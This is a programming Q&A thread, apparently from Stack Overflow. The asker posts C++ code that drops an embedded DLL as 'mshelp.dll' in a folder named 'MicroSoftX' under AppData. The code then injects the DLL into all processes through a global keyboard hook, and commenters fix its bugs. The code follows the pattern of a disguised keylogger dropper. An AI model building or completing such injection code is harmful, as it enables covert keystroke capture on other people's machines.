# GetFullPathName wont get DLL Path

Tags: c++, resources

I am trying to load a DLL from resource and use SetWindowsHook to inject DLL to all Process GetFullPathName doesnt Seem to Work in this case, Now i am asking what would I do to get the DLL Path in this case, My code looks like this. I am new to using This and hence i cannot seem to get the DLL Path

```
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include "resource.h"

void ExtractnRun()
{
    char* name = getenv("USERNAME");
    char info[1500];
    char aNewFile[1500];
    sprintf(info,"C:\\Users\\%s\\AppData\\Local\\MicroSoftX",name);
    //_mkdir(info);
    if (CreateDirectoryA(info, NULL)) 
    {
        MessageBoxA(NULL, "Directory Created", "", MB_OK);
    }
    // Extract From Resource 

    HRSRC hrsrc = FindResource(0, MAKEINTRESOURCE(IDR_DLL21),"DLL2");
    DWORD size = SizeofResource(0, hrsrc);
    PVOID buff = LockResource(LoadResource(0, hrsrc));

    DWORD dwBytesToWrite = (DWORD)strlen((char*)buff);
    DWORD dwBytesWritten = 0;

    sprintf(aNewFile, "C:\\Users\\%s\\AppData\\Local\\MicroSoftX\\mshelp.dll", name);

    HANDLE hFile = CreateFileA(aNewFile, GENERIC_WRITE, 0, NULL,CREATE_ALWAYS ,FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile) 
    {
        MessageBoxA(NULL, "File Created!", "", MB_OK);
    }
    /*FILE* f = fopen(aNewFile, "wb");
    fwrite(buff,1,size,f);
    fclose(f);
    */
    if (WriteFile(hFile, buff, size, &dwBytesWritten, NULL)) 
    {
        MessageBoxA(NULL, "Data Written to DLL", "", MB_OK);
    }

    /*STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    */

    char dll[MAX_PATH];
    GetFullPathName((LPCSTR)hFile, MAX_PATH, dll, NULL); // Shows Error here Cannot get Full Path of DLL

    printf("%s\n",dll);

    HMODULE MYdll = LoadLibrary(dll);
    if (MYdll == NULL)
    {
        printf("dll cannot be found!\n");
        getchar();
        printf("DLL : %s", MYdll);
    }

    HOOKPROC addr = (HOOKPROC)GetProcAddress(MYdll, "SayHelloWorld");
    if (addr == NULL)
    {
        printf("Cannot find Address!\n");
        getchar();
    }

    HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, MYdll, 0);
    if (handle == NULL)
    {
        printf("Hook Failed!\n");
        getchar();
    }

    printf("Program Hooked!\n");
    getchar();

    UnhookWindowsHookEx(handle);
    //printf("%s\n",dll);
    system("PAUSE");
}


int main()
{
    ExtractnRun();
    return 0;
}
```

The Exception Error i get looks like this :

> Exception thrown at 0x7764171A (ntdll.dll) in ResourceExample.exe:
>   0xC0000005: Access violation reading location 0x0000009C.
>
> If there is a handler for this exception, the program may be safely
>   continued.

What am I not getting correctly?

Comment: I think you've completely misunderstood what `GetFullPathName` does. It doesn't take a file handle, it converts a relative file **name** into an absolute file name.

Comment: In any case isn't the full path name `"C:\\Users\\%s\\AppData\\Local\\MicroSoftX\\mshelp.dll"`? What are you expecting that is different from this?

Comment: @john, ok how do i get a path pls

Comment: @John, sprintf() i used it to concatenate so as to create a path

Comment: Your variable `aNewFile` has the full path. I'll ask again, what are you expecting that is different from this?

Comment: yes here it shows the DLL, but later on the LoadLibrary() Line it shows No DLL

Comment: Well I certainly think you should close your file before you try to load your dll. Seems like you've misinterpretted the failure of LoadLibrary as having something to do with the path. In reality there are all sorts of reasons that LoadLibrary could fail other than "dll could not be found". Use GetLastError to find out why it failed.

Comment: In other words try this `CloseHandle(hFile); HMODULE MYdll = LoadLibrary(aNewFile); if (MYdll == NULL) { DWORD errorCode = GetLastError(); ...`

Comment: Seems CloseHandle() was what i needed. Works Now, thank you very Much

Comment: I see all kinds of problems with this code. Hard coding paths is wrong, use `SHGetFolderPath()` or `SHGetKnownFolderPath()` to get the user's proper `Local` path and then append your subfolder+filename to it. Don't use `strlen()` for binary data, you already have the proper byte size from `SizeofResource()`. `CreateFile()` returns `INVALID_HANDLE_VALUE` on error, so checking `hFile` for non-zero will never work. There is no need to use `GetFullPathName()` at all, even if you were calling it correctly, which you are not. Close `hFile`  then pass `aNewFile` as-is to `LoadLibrary()`.

Answer (score 0):

You can not pass the file handler to the "GetFullPahtName". It should be file name to find full path.

GetFullPathName(**(LPCSTR)hFile**, MAX_PATH, dll, NULL);

Please refer the below link for more details.

https://msdn.microsoft.com/en-us/library/windows/desktop/aa364963(v=vs.85).aspx